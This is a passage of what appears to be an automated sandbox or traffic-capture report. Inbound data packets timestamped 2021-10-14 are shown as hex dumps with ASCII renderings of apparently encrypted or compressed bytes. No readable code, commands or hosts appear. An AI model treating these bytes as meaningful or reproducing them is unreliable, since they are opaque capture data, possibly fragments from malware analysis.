c0 c2 87 25 a7 4e 80 14 be 20 12 42 8d Data Ascii: k<;lzS)B2K\|Kv0`F$(2i_mO\|Rn6OarEIpp_,z63cEfq/tQ=moqq4^QtFhd&BIM66HdJ?T'J+X?sv`KRsd@9%N B
2021-10-14 02:15:48 UTC	115	IN	Data Raw: 76 df 96 cf 50 e7 24 8a d6 08 2c 06 67 1a 40 59 64 98 42 27 37 56 20 39 c5 98 b0 22 e7 26 db c4 4f b7 bc 60 d6 af 2a 0d 6f 90 f1 43 f6 b4 e1 45 ed 4e c3 79 61 f3 94 67 17 d7 02 71 11 b8 13 5b 26 f8 4e 08 f4 60 f3 5d e0 88 d9 fd 18 f1 bc 8a ee e0 0b 7e 7d 8f 37 ef aa d5 82 66 54 a7 7c 2e 14 66 46 cb 94 cf 0c 79 32 b1 cb 94 61 a8 50 12 6f df 37 ee 96 5a c4 e5 1b e2 bb 90 89 54 dd a6 e8 f4 eb 9b f3 71 0e f5 35 23 9b 7d 3c 71 ff 48 0d 1b 60 fb 79 17 4d c6 80 68 92 77 88 46 ca f0 8d b1 5d dc c4 fd ce 47 81 59 60 dd 68 82 f1 99 40 aa bf da 4c 15 7a 9d b1 11 0d 51 8e 4d ce 49 d8 25 11 51 c5 14 96 59 45 b0 13 5b fd f8 78 2a f4 dc fc d6 08 c2 21 ba b9 f4 67 e0 ff e2 d2 a3 1b 97 49 e7 f2 8d d5 9f c6 81 c8 63 62 19 1a fb 1c 3e d5 d5 5a 06 2c 64 56 b7 6e bb 39 6b 53 Data Ascii: vP$,g@YdB'7V 9"&O`oCENyagq[&N`]~}7fT\|.fFy2aPo7ZTq5#}<qH`yMhwF]GY`h@LzQMI%QYE[x!gIcb>Z,dVn9kS
2021-10-14 02:15:48 UTC	116	IN	Data Raw: 0e 01 44 d8 3b dd a4 19 53 68 54 2d 5f 89 a9 36 34 e2 c4 1e f8 76 d9 29 bd f4 86 65 a4 73 03 28 18 be f6 34 43 43 7e 13 5c 67 de 2d 56 3a 40 11 43 b6 ea 20 5f cc b4 26 10 01 9b ac fb 55 55 7d 94 2c 74 4b d2 80 34 2a 03 c2 a2 ae 75 0a b5 e9 9b 6e 42 89 e2 91 66 1a 81 8f 99 c0 57 e4 eb 07 74 70 37 c0 63 dc 0d 6e a6 3b 5e 7b 03 4c aa 3c bf fd 40 ef cf 99 8a a5 88 8f d0 20 85 69 80 ff 12 df fc 21 f8 30 ca 4b de ef 70 1d 40 27 a9 92 e6 37 16 fc bd cc 18 31 ca 1e 6c f7 40 ef 2f 48 61 90 5c 27 a3 fe 10 d5 a7 b9 d6 99 70 be 03 1f bc 83 27 8d 53 1e f6 1c a7 92 8e fa 72 db 4d b4 59 cb 1d 8d a5 ab 11 a5 a4 dd e1 e5 cb 24 a6 52 10 38 0e 3b e2 2e 84 27 9e bb 03 53 53 0b f0 4d d2 f5 1a 37 ba 62 e0 27 65 f0 90 13 98 0b a7 80 0d dd 8e 03 26 c4 b5 87 fd ab 08 8c 97 56 ba Data Ascii: D;ShT-_64v)es(4CC~\g-V:@C _&UU},tK4*unBfWtp7cn;^{L<@ i!0Kp@'71l@/Ha\'p'SrMY$R8;.'SSM7b'e&V
2021-10-14 02:15:48 UTC	118	IN	Data Raw: 12 33 e9 e0 fb 84 16 42 ec 93 99 3e ad 03 e4 42 32 62 b9 8d 09 75 51 7a 1c 32 bc 15 44 23 b4 b6 ac 98 cc 5a 4d 81 f0 bd 6e 58 df c6 8e 7a 5c 22 f2 c5 1f fa 81 20 39 40 58 19 dd 43 27 33 3c 7b 1a c5 8b 80 27 e7 59 2a fb 16 68 2d 60 c7 b3 8e 1f 81 74 db 43 f6 b5 fb 56 f7 3e 75 42 ac e2 eb 2f 3d f5 04 7a 72 26 0a 34 cd f0 58 01 d0 52 fb 55 ca 95 c8 f8 18 c8 5b 9f 10 eb 0f 9e 67 9c 38 73 b2 c7 4e 95 5c 9a 69 1d b6 26 6d cb 83 fd 74 3f 8c b1 cf 4e 97 b3 43 06 79 dd 37 c9 37 a4 c5 dc 8c f3 be 8d 75 2e b4 b2 ef d8 fe e5 b5 76 06 7d 16 35 9d 54 66 a4 fd 42 05 3f 02 af 7d 17 58 d5 bf 9c 93 5b a0 23 9f f4 8d a4 51 c1 ec f1 da b2 aa 75 7c cd 64 58 f3 98 5c 56 a9 99 42 1e 6d 4d c1 4b 05 42 8f 5c db 4e bf 98 11 7d c9 34 b0 52 af f9 0f 48 fc ee 61 26 e9 ae 41 d6 24 cd Data Ascii: 3B>B2buQz2D#ZMnXz\" 9@XC'3<{'Y*h-`tCV>uB/=zr&4XRU[g8sN\i&mt?NCy77u.v}5TfB?}X[#Qu\|dX\VBmMKB\N}4RHa&A$
2021-10-14 02:15:48 UTC	119	IN	Data Raw: 85 eb 85 b0 4b 8b 18 82 5f ac 7a de 32 e5 2a 3b 3e 1c 0b 38 69 c3 d0 7a 3d 9a 4c 29 ea d7 4c bc 8e 89 f9 a9 24 3d c0 ae f0 1f 0a f9 c5 da c8 9c 3a 7d da 51 2b 44 a4 05 b8 1f e8 ec a9 f0 61 5e 17 70 f5 87 76 aa 76 2c fd 0a bb 7c 1c ce 44 7f b1 4c 73 ea 14 c6 2c 56 97 54 5b eb 21 f7 f5 48 30 04 1f 2f 10 f6 46 52 69 ad e2 68 59 2a 96 95 0f 12 c4 b5 27 7c 0a 94 ff 87 32 6f 89 e2 8b ec 1f a0 9b 87 fc 4b 46 eb 0d 0a 76 1f 03 7b d6 14 6a 38 31 5e 6a 0f 40 99 d3 9c c7 5d 72 f8 8f 1a 88 72 81 e0 27 9c 7d b9 51 0a 21 f7 19 c7 f1 b2 02 d9 f8 f9 94 f7 3d 7e 96 1f 31 e3 67 80 40 27 30 c7 06 dd eb 63 ea 36 43 5e cd 5d 0b a3 fb 3c 06 72 aa d4 90 e5 aa 0e 1f ac 9a 2c 80 85 bc da 0c af c1 db fb 72 d5 4b f8 1e de 35 4e b9 b1 04 bf 29 cb ec fa d9 c9 84 6f 39 3f 10 a0 4d 02 Data Ascii: K_z2;>8iz=L)L$=:}Q+Da^pvv,\|DLs,VT[!H0/FRihY'\|2oKFv{j81^j@]rr'}Q!=~1g@'0c6C^]<r,rK5N)o9?M
2021-10-14 02:15:48 UTC	120	IN	Data Raw: bf 62 23 d4 25 9f 19 9f ef 6f e9 42 04 c4 4c 09 fa dd 17 04 f6 ac 25 86 7a d5 6c 1b 30 63 08 c5 f8 e9 31 0c 7f 12 26 dd aa e3 23 ec f1 6a 63 38 41 fe 93 b9 06 b2 07 fd bc 21 6b 94 7e 21 6f 48 f3 36 23 b9 18 a9 3e 89 a9 af a3 e1 5e 5c 82 fc ce 68 74 dd ec 98 45 f3 08 3e 0c 1f f0 a3 64 1f 40 5e 0f f5 ab 25 33 76 31 25 d1 a3 a8 23 e7 5f cc 49 48 40 bc 61 d3 ad 2d 20 f4 f9 f0 49 de 9d f5 40 f6 a6 ea bd 74 f1 e5 0a ff d5 06 79 7b e2 06 73 0a f4 58 0d ca d8 f5 5d ea 97 de ec 0c c8 1a 9d 10 eb 0f 57 60 9c 34 f9 93 38 9a 98 5f a3 84 2e 6f 2b 6f 7d 90 cd 7d 13 2e a0 d3 5a 43 34 40 17 69 d8 bf f6 9c a4 c4 c8 98 f6 93 33 8b 2f 92 8f 74 f0 e9 ea a6 6a 1f ed 29 1d b5 51 09 76 e9 cf 08 19 1c bd 6c 03 5d f8 0b 62 92 7d 8b 13 89 f1 8b a3 7c 2b 13 f0 fc 9b cd 48 7c ca 49 Data Ascii: b#%oBL%zl0c1&#jc8A!k~!oH6#>^\htE>d@^%3v1%#_IH@a- I@ty{sX]W`48_.o+o}}.ZC4@i3/tj)Qvl]b}\|+H\|I
2021-10-14 02:15:48 UTC	121	IN	Data Raw: 9f 1b 2b 38 0f e5 be 89 cb fc c2 42 a1 2b 61 3b 89 c9 08 c1 1b c6 b2 83 67 09 c1 ba 36 2b 7f 0a f5 19 ba 38 fd 02 26 2c ec 94 e4 84 87 79 70 19 a8 ed ac 60 e2 a9 f0 02 92 04 75 fe d6 91 c8 e0 86 2e 9a 5b 29 78 c8 b2 bd a3 90 ef 81 6d d4 17 77 ea 06 1f 4c d4 d4 cb 97 31 ab 78 7d 08 5f 81 57 46 1e e2 c2 09 9f b0 56 2e b7 9b 7b 77 a3 64 1c 51 d8 b9 7a 01 2c bd 7e b1 4b 73 c4 1a c6 29 57 1b 7a 4c fc de 54 c8 6b 3c 03 1c 07 a2 e1 59 72 83 84 0d 64 48 38 90 0d 86 a5 fb c3 36 5d 1b aa c2 82 a9 50 98 f5 95 58 f0 80 a3 9c e0 4b 6a ea 0d 0a 58 d8 3e 87 29 0d 6a a6 21 5e 7b 19 4c b0 3c bf fd 5a ef c2 a7 0c 8b d0 96 f8 c7 88 69 91 ed 06 32 ea 0d fe 25 ae 1b 21 ee 58 87 e6 3b 6e 81 14 46 c1 71 9c a3 ef 31 c7 01 6c e8 5f e4 31 40 76 7f 4a 14 b9 11 15 ee 7a d9 24 87 68 Data Ascii: +8B+a;g6+8&,yp`u.[)xmwL1x}_WFV.{wdQz,~Ks)WzLTk<YrdH86]PXKjX>)j!^{L<Zi2%!X;nFq1l_1@vJz$h
2021-10-14 02:15:48 UTC	123	IN	Data Raw: 90 04 b7 f0 71 ff 0e 1a 86 f9 85 5f c0 92 79 67 93 67 38 33 4d b3 ff 5d 77 c3 1d 9f a6 14 ff 83 6c 44 95 a0 6a 64 73 d4 f1 9b 6a 0b e3 34 8f 02 ad 0e 40 ec 42 14 61 49 0b fa da 2c f4 f6 84 08 ec 5c d1 44 39 21 73 01 d9 21 ea 31 0c 6a 17 27 a6 dd 13 22 e6 29 0a a0 12 76 f4 80 96 2d a8 2e c5 bc 33 44 62 99 32 65 55 a9 0f 29 a8 09 ab 35 a6 c0 45 74 36 4b 49 93 3c 50 7a 65 c8 fc 9a df 50 1f 76 f1 e0 05 8d 66 1a 01 6c 19 dd 43 27 33 7c 73 39 c5 8b 8b 27 e7 59 84 c4 4f 40 ae 60 c7 b9 23 08 57 f8 f0 43 f6 b4 6d 40 f0 b0 af 54 76 f1 e5 20 16 d7 09 73 6a fe 08 5b 22 f1 43 3b d5 55 a8 5c ea 96 cf f9 18 f1 bb 97 12 f7 48 9c 64 9c 38 f0 e4 e3 90 9a 42 e4 65 2d 6f 2b 4d cd b8 51 77 3f 39 99 a9 4f 6b b9 4e 64 49 cf 32 fb 8f a0 d4 d8 98 ca 93 94 8b 29 8f 2a ef f0 e9 e1 Data Ascii: q_ygg83M]wlDjdsj4@BaI,\D9!s!1j'")v-.3Db2eU)5Et6KI<PzePvflC'3\|s9'YO@`#WCm@Tv sj["C;U\Hd8Be-o+MQw?9OkNdI2)*
2021-10-14 02:15:48 UTC	124	IN	Data Raw: 9c 20 7c 10 07 2d e2 b7 42 b6 55 e2 a8 c0 51 06 63 39 3c f2 e7 1f f9 d8 da fc 36 9e f8 94 e7 a1 f4 50 8e e1 0f 29 73 50 58 94 c0 39 39 f1 f5 a3 90 c4 2f c1 6d 33 8d 0c aa 84 e1 21 c6 19 bb 1a ac 65 0d ef ca df 29 75 7d e5 3c b8 3c f8 0b 00 44 84 95 f5 97 9a 15 0e 19 84 f9 95 89 c8 26 fb 06 8c c0 1d 17 d7 6f dc ff b9 14 98 4e b0 d0 ad ce bd 8f 9e e4 ba 40 a9 e9 88 f1 37 54 59 d4 cf a1 09 2f 55 7d 55 3d 4c f7 b9 bb 1f e6 c6 64 72 60 54 2a 95 19 85 76 a9 67 10 c0 08 ad 84 0a 4f 4b 53 f6 4f 65 44 b2 9b be 41 1b 6f 59 e9 5b d1 e5 68 20 38 53 05 b3 fc 3b db 7c 85 25 6e 4f 2e fa 9b 09 12 c0 b6 4f d9 1a b5 ed b9 53 52 89 e8 88 4b 80 36 f2 15 e9 63 e1 e9 0f 7b e4 36 c0 7c fe 4a 7f b5 3c 23 ef 0f 53 bf e8 be d1 59 ce c5 8f 27 88 d0 90 cb 32 88 78 87 e1 0e 19 d2 0c Data Ascii: \|-BUQc9<6P)sPX99/m3!e)u}<<D&oN@7TY/U}U=Ldr`T*vgOKSOeDAoY[h 8S;\|%nO.OSRK6c{6\|J<#SY'2x
2021-10-14 02:15:48 UTC	125	IN	Data Raw: c2 99 56 e3 e7 4b 12 ed 87 ef 33 3c 8e ce 21 eb 79 e5 6f 72 a0 75 07 2b 83 8a 6b 10 fa c8 2a 9d dc 6d d9 86 86 ac 6e b9 b7 a9 2b bc d0 7c eb 36 27 89 d1 ae 4e d0 85 43 0d 82 d6 3b 33 4f bd e6 d6 5e c6 3c bc b9 1b c8 f5 71 48 bb a5 83 66 75 f4 fc c1 f1 0a e5 21 80 19 3c 03 40 e5 64 0d 43 78 6d e5 d7 2c 32 f6 84 04 a9 24 ad dd 3e 30 67 1d bd 91 cd 1c 01 4a 19 3c d6 aa 0b 0a c1 f5 05 83 10 23 8a 19 9d 3e b8 19 f1 26 16 63 b0 bf 3c 63 5d 0d 03 3f 91 2e b8 22 9e 9f d5 f5 50 5b 5c 80 f5 4e f5 51 f0 e2 aa 4e ea 00 13 0c 1f fa 94 46 32 6d 5a 19 db 69 49 4d e5 21 39 c1 94 8e bd c2 74 d5 e2 50 4e 9c f8 c7 b9 39 17 5d d1 dd 41 f6 b2 da 2e 8e 29 c3 55 72 ee e0 b8 33 fa 09 55 75 f1 32 f9 22 f0 58 14 ce 7d df 5f ea 90 e0 96 66 79 b8 9d 14 fe 37 e7 40 b1 3d c9 a4 c0 b8 Data Ascii: VK3<!yoru+k*mn+\|6'NC;3O^<qHfu!<@dCxm,2$>0gJ<#>&c<c]?."P[\NQNF2mZiIM!9tPN9]A.)Ur3Uu2"X}_fy7@=
2021-10-14 02:15:48 UTC	127	IN	Data Raw: a7 1b c8 20 eb 94 b7 bd 94 33 f4 24 39 69 72 b3 1d 1b 61 f5 82 0d 4b 42 df d8 6c fb 97 57 8a e2 f1 2e 05 28 b6 1b 80 ce 84 83 04 9d 3d 6a bc e0 b5 40 d3 48 cf aa c4 2a 52 08 47 a1 f1 37 56 e6 e1 42 f1 0f 90 de 81 f6 81 63 52 84 9c 6e 00 5e 56 5b 86 14 52 51 96 f5 a9 92 f7 38 59 4b 90 34 57 35 bf c1 b9 c6 1b c0 87 85 48 0b c7 94 f7 43 01 99 9b 3d bc 27 c0 87 27 12 f5 b2 ea a8 b8 cd 8c 18 84 e4 95 49 c8 26 f7 28 f6 40 85 00 29 6a c8 c4 0f 1c b7 45 18 78 ec 6c 1a 8d 9a e6 a7 32 03 c5 8a f5 19 26 31 aa 5c dd 88 2a 4a 44 cb 0e 63 82 1e a5 22 c2 6b 1d f0 61 43 06 90 f6 87 70 89 08 7a a7 08 bb 7e 14 7d d9 5a 9c 43 46 d5 3b c6 8a 42 1b 6b 4c c3 0d 57 e4 6e 0e 7a 75 9e b2 f6 42 47 42 1f 04 46 57 0a 9e 27 28 a3 c6 b4 34 41 33 98 eb 91 b8 7a e7 9c 13 4f 0e 85 90 d3 Data Ascii: 3$9iraKBlW.(=j@HRG7VBcRn^V[RQ8YK4W5HC=''I&(@)jExl2&1\JDc"kaCpz~}ZCF;BkLWnzuBGBFW'(4A3zO
2021-10-14 02:15:48 UTC	128	IN	Data Raw: 34 38 b0 17 41 5e de 74 2d a6 c3 cf 3e 6a b6 bc 7d ad 93 27 f1 21 2e 3f 63 3e c7 a9 64 43 3d 6d c2 ca 9a 3f 7f 75 fd a3 f9 dd b2 61 c2 cd 66 16 c7 ef bb f0 43 17 cb 3e 87 fe 5a 67 50 8d 4c 72 14 10 91 64 38 c8 c5 02 b6 f4 37 a1 35 ed d2 f3 a6 2d 88 19 de 6c 47 d9 73 1e 9b 90 a3 f2 d4 83 69 74 d4 62 38 33 4d 88 81 32 e2 ea 30 9e b9 78 4d 88 43 4b b5 97 eb 46 b0 da 9e bf 77 2e cd 08 9d 13 a0 0c 03 97 db 13 49 63 16 91 46 21 32 fb a2 1d e8 5a 3b 40 3f 30 7c 09 9e 26 ea 31 0c 46 68 49 50 c4 12 26 f3 9b 9f a0 17 4e d2 9f f0 1e 4f 02 fd bc 2c 5b 94 b4 21 6f 44 55 76 5d 20 02 ba 26 87 d8 21 ae e4 54 7a 9b 87 63 67 71 dd ed 90 79 ca 22 9d 0a 35 94 f5 d5 1b 40 5c 06 b3 d9 02 1e 73 06 26 ab ab 8e 22 e7 59 c5 d4 67 6d be 60 c1 93 53 76 ce f8 f0 47 e9 db 6a 65 dd be Data Ascii: 48A^t->j}'!.?c>dC=m?uafC>ZgPLrd875-lGsitb83M20xMCKFw.IcF!2Z;@?0\|&1FhIP&NO,[!oDUv] &!Tzcgqy"5@\s&"Ygm`SvGje
2021-10-14 02:15:48 UTC	129	IN	Data Raw: b8 f4 6d c9 84 9e 91 a2 01 bb b2 e8 ca 39 ff 1d b8 1a b2 26 67 39 8c ed 14 37 5e f4 5f 22 0b 44 ce b5 7f bf 64 50 55 20 f3 bf 35 cf 48 95 0b 9c 3f ee b5 c2 be 18 64 ef 95 02 2c db 5e ad 1c 6d 7b 64 f5 6e fb b1 02 e7 9c 68 32 2d 01 ab 23 1c c1 2b f3 bb 83 05 4e 0d 76 b5 40 c8 fa c7 85 d5 0a 58 f6 39 38 f0 17 d4 fe d8 d8 ca 0a b3 fa 9e c9 8b 77 2e 1d 9d 72 2c 53 c1 5b 80 3e a2 0a 22 e5 8f b6 7d 02 c3 6e 9d b4 76 2a 85 f6 0d e9 19 c0 9c 87 e7 77 5e 93 dd 2d 5f 96 9a 3d b8 a2 de 30 13 19 db 02 f5 93 98 4e 01 1f 84 fd aa 4c e7 24 f1 04 b2 bc 62 98 28 6e d3 d8 02 39 9a 4a a4 42 fd 5d 9a af 0d e6 b8 3b 0b 78 8f f5 1f 16 73 f9 c7 dc 8e 04 d7 07 c8 2a 4e 88 18 22 1f e2 c4 85 d5 4c 45 08 9d 6c 87 76 a3 42 90 39 09 bb 63 23 6e 41 7f b7 67 e6 b4 9c e7 3a 44 3b f2 5b Data Ascii: m9&g97^_"DdPU 5H?d,^m{dnh2-#+Nv@X98w.r,S[>"}nvw^-_=0NL$b(n9JB];xsN"LElvB9c#nAg:D;[
2021-10-14 02:15:48 UTC	130	IN	Data Raw: f2 f2 5d ea b6 88 f0 18 e0 a6 94 38 cc 25 7d 63 b6 b4 91 22 d1 98 9c 75 23 6d 2c 6f bb 62 e6 82 eb 57 97 33 b1 cf 6e 20 bb 43 17 70 de 1a dc 9e a4 c3 f6 0e 9c 22 91 8b 2b b8 0e e8 f0 e9 7a 90 5d 1f d7 1d 9c 9d 55 09 50 a4 4a 0f 19 07 94 55 15 49 d6 82 e0 ec ee a2 3b 88 d1 27 b5 54 da 88 d5 db a6 a7 79 ca de 61 58 c2 fd 4a a8 a8 af 62 3a 78 9b ca 7e 8e 2f 13 5d ca 4f 83 cd 10 51 c1 bf 91 76 2f d3 32 f0 f9 ee 70 03 92 af bf d7 16 ee 24 8d b8 f2 47 6b 83 00 90 a2 1f b3 33 ea ca 3f 4f ba eb 92 95 06 cf 19 1e ed 34 5b cc d1 72 2a 05 49 5e b5 79 95 c2 53 cb 21 f3 a3 3d 4f 4a 95 0d 2c 98 bd 3e e5 9e b1 44 7c 95 22 43 49 7b 80 12 44 73 da f7 6e fd bb ff 9e 05 69 2f 01 0c 07 23 1a eb 33 a8 0f 93 23 6a 83 e2 b5 40 e8 1e ea a8 c4 34 50 4f 3b 38 f6 1d d4 87 41 d9 d4 Data Ascii: ]8%}c"u#m,obW3n Cp"+z]UPJUI;'TyaXJb:x~/]OQv/2p$Gk3?O4[r*I^yS!=OJ,>D\|"CI{Dsni/#3#j@4PO;8A
2021-10-14 02:15:48 UTC	131	IN	Data Raw: ac 0a 2e 32 0a b4 34 5d 3b 75 e3 91 be 4f ab ca a7 4c 0e 87 a5 15 96 fa e4 eb 09 20 ad 37 c0 78 4c 37 50 a7 10 7e a5 0e 53 bb e2 5c db 4a fe d8 ad 32 a4 d2 90 c4 19 0e 17 08 f3 0a 25 dd dd ef 32 b1 98 fa c2 66 b5 d7 ed 7f 85 3c 00 c4 7a 96 cc 07 13 ef 2a 7d fa 46 d4 a4 29 ef 6f 5d 0f 89 3e 14 c2 71 30 f7 ab 7a 8b 2e ce ad 8e 38 b4 8a 14 da 0c ba cc e2 d6 70 df 5e de 91 b4 84 8c ba b5 22 7a a4 cc ec 60 fd f7 b5 58 3a fb 06 2c 72 22 d7 33 8a a8 11 75 6a 2b ee b3 d5 f3 96 41 57 71 e0 23 5e 29 8d 00 95 91 93 a0 00 ee 50 d1 0a ce a4 af 97 30 24 25 97 67 81 75 d1 2b 58 00 b4 12 c8 f9 6b 4f a6 8d cb 3e 6a 33 89 78 92 b7 07 23 0b 44 41 da a6 cc ad 7b 3b 82 60 c2 c6 bc 26 32 d3 29 3e f8 dd ad 69 3a cf 66 10 77 a4 e8 7b 64 37 1a 21 ef 64 5f f4 54 ab 53 05 10 97 b8 Data Ascii: .24];uOL 7xL7P~S\J2%2f<z*}F)o]>q0z.8p^"z`X:,r"3uj+AWq#^)P0$%gu+XkO>j3x#DA{;`&2)>i:fw{d7!d_TS
2021-10-14 02:15:48 UTC	132	IN	Data Raw: e7 5d fa 31 4f 40 bc fa e2 94 28 2e 77 0c f0 43 f6 94 fd 4e f0 b0 d8 7d 5b f3 ef 24 3c 55 78 ea 6b fe 16 7b d4 f0 58 0b 46 70 df 4c cc b6 3c f8 18 e0 99 8c 1e e1 27 67 4d b1 30 ef bd fa 1a e6 cc 8a 6d 28 4f d6 47 cb 90 57 52 12 22 97 ef b9 6b b3 43 37 7a c0 32 f1 86 8c e8 de 8c e4 91 12 f5 b6 99 a7 ec d0 11 e0 b5 70 94 d4 10 24 bb 75 f1 70 ff 42 2f 00 12 bc 78 0e 61 fd aa 62 94 5d 21 45 15 f0 8d b1 74 23 12 f0 f6 2d a4 74 71 f8 41 a1 e2 9d 42 88 b4 bb 4a 17 67 b3 e1 56 0c 57 a0 de b4 d2 a2 66 14 71 3b 25 b4 5b a4 d0 3f 4a df ce 8a 23 f6 a7 9f f4 06 c6 09 92 90 d9 6f e9 fb b3 17 dc 82 92 9f ee ea c4 d5 9f c6 19 96 0b 71 3f 3e 16 14 37 c4 f1 58 3d 2d 64 43 b8 57 92 46 2d 54 0a 71 d9 84 e3 4a 91 2d 4a bd 90 2c 59 9b 31 55 5a b5 fe 2c 41 7b a0 3a 45 5b f7 eb Data Ascii: ]1O@(.wCN}[$<Uxk{XFpL<'gM0m(OGWR"kC7z2p$upB/xab]!Et#-tqABJgVWfq;%[?J#oq?>7X=-dCWF-TqJ-J,Y1UZ,A{:E[
2021-10-14 02:15:48 UTC	134	IN	Data Raw: 3a 63 04 3a 29 a7 7b 0b 43 d9 5a 9c 5f 46 ea 19 e7 3a 40 3b 49 4b eb 20 4a c5 40 09 12 0b 01 99 70 38 c1 7c 85 25 4b 44 2d 81 18 92 37 e9 a6 12 7d 06 b4 e9 91 9e 13 99 e2 8a 51 07 a9 a2 91 e8 65 cf 6d 73 99 63 37 c4 58 c8 13 7d b5 ac 7b 47 1c 75 9b dc bf d1 4a de 8b 9f 1a 89 cf 83 ea 1e 8a 69 97 d8 88 5f 64 0c ef 36 91 1d de ef 74 09 d2 10 6e a3 1c 3f c1 71 96 ec 47 20 c7 07 64 d2 6d fc 22 51 5c e8 23 92 a8 ef 10 e2 51 ab d2 86 f2 88 23 0d 8b ae 18 95 ad 1f fa 68 b5 e9 ca e4 7d f7 75 f6 17 cc 37 0f c4 28 03 a8 a0 ec cd fb d8 da 3d 5b 37 38 20 0c 53 03 9b 38 aa db 1e 53 42 18 c4 9e d1 d9 16 15 48 0e 79 26 7e fe ad 22 94 0b b6 17 37 e5 62 24 2a ec a5 8f e5 1b 5f 35 88 40 b6 52 fb 06 5c 2a 34 46 d3 86 f2 4a 86 5d eb 1d 6b a9 ac cf a5 bc 36 d1 2b 67 40 fa 3f Data Ascii: :c:){CZ_F:@;IK J@p8\|%KD-7}Qemsc7X}{GuJi_d6tn?qG dm"Q\#Q#h}u7(=[78 S8SBHy&~"7b$_5@R\4FJ]k6+g@?
2021-10-14 02:15:48 UTC	135	IN	Data Raw: ba 3d 8b 9d 96 89 c9 5c 76 02 94 da 6e 74 d9 cd cf 50 e7 20 07 29 32 e8 ad 6c 59 41 58 19 fd 6e 35 33 7c 3f 1d ed a6 82 27 e1 73 5c ba d6 41 bc 64 e7 fd 38 08 57 63 d5 6e e4 92 d0 04 f1 b0 c2 75 27 e3 ef 22 09 c8 2e 5e 68 fe 14 71 a4 8e c1 0a dc 51 d2 18 eb 96 ca 62 3d cd ab bb 30 a4 26 7d 65 bc 42 fd bb d0 87 bc 7d a6 6f 2c 69 0b c1 b5 09 cc 77 3b 13 f7 ce 4e 6b 29 66 3a 7d e8 12 b7 9d a4 c5 fc 18 f0 bb 90 94 0c b0 8a ea f0 ef ca 33 0e 97 f0 3d 31 bd 12 08 70 ff d8 2a 34 0e 9a 58 50 48 d0 a8 42 25 65 a3 3b 93 d5 a5 98 56 da 14 da 70 c9 18 58 60 da 41 10 e3 9d 42 32 8d 98 58 31 5a d3 cd 54 0c 71 51 4e ca 4b bc 69 38 7c c3 25 b2 71 b8 8b 8b 5a f9 ea 50 6a f7 a7 bf 4d 2d eb 1b a9 98 bd 6c e9 fd b9 7b b0 1b 93 80 ce e2 12 d7 9f c0 a9 35 58 fa 18 1e e9 34 7d Data Ascii: =\vntP )2lYAXn53\|?'s\Ad8Wcnu'".^hqQb=0&}eB}o,iw;Nk)f:}3=1p*4XPHB%e;VpX`AB2X1ZTqQNKi8\|%qZPjM-l{5X4}
2021-10-14 02:15:48 UTC	136	IN	Data Raw: fd f5 61 ad a9 ba 8f b9 3b 2b c8 f7 e0 1f 0c 45 fc e8 de 88 28 7f fb 2f b2 4f 8c 3c 9a 75 e3 c4 1f 6a 44 79 3f 9b d4 ed 77 a3 62 24 b9 1c bb 7a 11 6b 6e 7d b1 4b 4a 48 7b 7f 3b 40 1f 4b 30 ea 20 55 7e 4d 09 01 2d 27 d8 f7 46 58 5d 0e 34 6b 59 36 a9 35 0a 12 c2 9e b6 23 82 b4 e9 95 9e 3c 88 e2 8a d4 2b ac 9e b5 c8 0f e4 eb 0d 20 ed 22 c0 78 cd 3a 50 b7 36 58 40 88 2d 22 c3 be d5 6a 93 c6 8f 1a 13 f5 bd d0 15 a8 04 90 f2 0a 01 69 18 ef 32 ae 09 f7 c2 76 93 f1 17 f9 fb a5 21 c0 75 b6 a2 19 30 c7 9d 5a d7 52 d8 02 39 77 6e 5d 2b 36 fa 14 c2 6e a6 fa ab 6a ad 08 35 2b f0 a1 95 ad 1b fa 63 a4 e9 ca 61 57 f2 4a d2 37 a5 1c 8d ba 91 a9 bd a4 cc f3 da f0 f7 a5 7e 1c 03 80 52 eb 03 9b 3c aa d8 0f 53 42 9c c9 9e c1 ff 30 4f cf 70 e0 07 b5 ef 8d 00 8a 06 9e a0 10 c8 Data Ascii: a;+E(/O<ujDy?wb$zkn}KJH{;@K0 U~M-'FX]4kY65#<+ "x:P6X@-"ji2v!u0ZR9wn]+6nj5+caWJ7~R<SB0Op
2021-10-14 02:15:48 UTC	137	IN	Data Raw: 4e fa 03 b6 0f c8 a1 0b 6c 06 ad ec e8 00 04 cc 67 04 85 3a 61 33 97 9c 3e a3 0f d5 91 31 4e ba b3 a5 11 db 7e 1c 27 99 92 bb 22 98 2f 9e a6 db 7c 7c 15 eb 43 6f 54 0d fa 8c 51 f8 2e b5 21 1d fa 8d 66 9c 3e c1 18 dd 47 07 a1 7d 20 39 5f ae ad 35 c1 79 48 c5 4f 40 9c be d0 b9 39 17 5b d1 dd 41 f6 b2 da c2 8e 29 c3 55 72 d1 7c 23 16 d7 9c 56 47 ef 34 7b b1 f1 58 0b fc bf e5 5d ea 8f e2 d5 1a e0 bf b7 92 9f be 7c 65 98 12 7b ba d0 98 02 70 a6 7c 0a 4f b5 46 cb 90 ed 9a 28 33 b1 d4 66 46 b1 43 11 45 4c 4c 68 9d a4 c1 fc 19 e3 bb 90 11 0a b5 b6 ce d0 7c e1 b5 70 2e 03 2a 35 9d 48 21 5d fd 42 09 33 9e c2 e1 16 49 d4 88 f4 93 77 a3 a1 a9 dc 9c 93 74 4c 13 f0 f6 97 78 4e 60 de 7b 70 cf 9f 42 ae 82 33 34 8e 7b 9b c8 74 9b 50 8a 5c 50 6e 8e 74 36 71 56 24 b4 5b 1e Data Ascii: Nlg:a3>1N~'"/\|\|CoTQ.!f>G} 9_5yHO@9[A)Ur\|#VG4{X]\|e{p\|OF(3fFCELLh\|p.*5H!]B3IwtLxN`{pB34{tP\Pnt6qV$[
2021-10-14 02:15:48 UTC	139	IN	Data Raw: f7 ab 01 99 9b 3d bc 18 4c 1c 02 3f 61 b1 d8 82 be 4e 39 19 84 fd 9d 02 d3 26 f1 15 b0 13 1e 01 2f 44 55 86 0c 38 9a 4e 1e df d1 4c bc 15 bf cb a9 1d 0b 50 89 f5 1f 2c 3c cd c5 dc 94 06 78 7b 51 2d 64 0e 46 23 1e e2 c0 3f 49 60 54 2e 27 d1 aa 67 85 42 bd 3f 09 bb 5a 66 5a 43 7f ac 65 4d c8 05 e0 10 c2 65 f2 5a eb 24 75 5e 69 24 10 91 22 9e e7 60 78 c7 84 21 6b 79 58 98 18 08 0e ec 99 36 5d 1d 9f 6b ef 27 51 89 e6 aa f5 0f 81 8f 09 cd 4e f4 cd 2d bb 63 37 c0 58 ac 0b 7d b5 2b 76 47 0c 53 bd e8 38 af d3 ff c7 8b 3a 35 d1 90 c2 a9 ad 44 83 d4 2a 9d fc 0d ef 12 30 1b df ef 6b 8b df 10 7d 85 3a 0a 